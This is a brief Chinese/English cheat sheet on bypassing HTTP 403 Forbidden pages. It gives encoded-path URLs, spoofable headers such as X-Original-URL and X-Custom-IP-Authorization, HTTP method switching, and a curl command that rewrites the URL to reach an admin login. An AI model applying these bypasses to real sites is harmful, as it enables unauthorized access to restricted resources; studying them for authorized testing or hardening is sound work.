403 Forbidden Bypass Technique.
403 Forbidden 是HTTP协议中的一个状态码(Status Code), 白话理解,没有权限访问此站 。 该状态表示服务器处理了本次请求,但是拒绝执行该务 。一般情况站点都是不会允许直接读取目录内容的。
每当发现403页面时,这意味着里面有东西,我们只需要绕过它。绕过403禁止的技术有很多,但在这里暂且讨论我们可以使用的前4种方法。
尝试添加 {%2e} or {%2f} { /*, /./}在第一个斜杠后面!
https://www.domain/DB = 403
https://www.domain/%2e/DB =200
https://www.domain/./DB =200
向请求模块添加头信息
Content-Length: 0
X-rewrite-url
X-Original-URL
X-Custom-IP-Authorization
X-Forwarded-For
Change requested method
GET → POST, GET → TRACE, GET → PUT, GET → OPTIONS
USing CURL
curl -i -s -k -X $’GET’ -H $’Host: account.domain.com’ -H $’X-rewrite-url: admin/login’ $’https://account.domain.com/'